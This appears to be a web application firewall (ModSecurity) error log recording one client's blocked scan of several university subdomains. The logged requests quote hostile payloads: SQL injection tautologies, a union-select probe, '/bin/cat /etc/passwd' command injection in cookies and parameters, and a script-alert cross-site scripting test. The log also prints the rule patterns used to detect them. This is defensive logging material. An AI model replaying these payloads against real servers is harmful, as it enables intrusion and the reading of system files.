[Tue Aug 29 11:33:41.430950 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAAR@KHUAAAAF"]
[Tue Aug 29 11:33:41.444114 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAANsAj4AAAAD"]
[Tue Aug 29 11:33:41.447800 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARy-yMAAAAb"]
[Tue Aug 29 11:33:41.460919 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAASBXSQAAAAM"]
[Tue Aug 29 11:33:42.297333 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARo82wAAAAT"]
[Tue Aug 29 11:33:42.315495 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARQ4BUAAAAB"]
[Tue Aug 29 11:33:42.317959 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JsCo-f0AAARy-yUAAAAb"]
[Tue Aug 29 11:33:42.328287 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARtAA0AAAAV"]
[Tue Aug 29 11:33:42.337712 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARQ4BYAAAAB"]
[Tue Aug 29 11:33:42.345489 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAANsAkIAAAAD"]
[Tue Aug 29 11:33:42.349697 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11JsCo-f0AAARtAA4AAAAV"]
[Tue Aug 29 11:33:43.331374 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAAQKOooAAAAs"]
[Tue Aug 29 11:33:43.360242 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4BoAAAAB"]
[Tue Aug 29 11:33:43.421755 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4B0AAAAB"]
[Tue Aug 29 11:33:43.436478 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAAQKOo4AAAAs"]
[Tue Aug 29 11:33:43.450972 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11J8Co-f0AAARjjQcAAAAL"]
[Tue Aug 29 11:33:43.554682 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11J8Co-f0AAARy-yoAAAAb"]
[Tue Aug 29 11:33:43.605558 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4CQAAAAB"]
[Tue Aug 29 11:33:44.570928 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11KMCo-f0AAAQKOpYAAAAs"]
[Tue Aug 29 11:33:44.572897 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11KMCo-f0AAARy-zIAAAAb"]
[Tue Aug 29 11:33:45.384162 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAANsAk0AAAAD"]
[Tue Aug 29 11:33:45.440189 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASEJO8AAAAE"]
[Tue Aug 29 11:33:45.444109 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAANsAlAAAAAD"]
[Tue Aug 29 11:33:45.451393 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAARy-zkAAAAb"]
[Tue Aug 29 11:33:45.481667 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASEJPEAAAAE"]
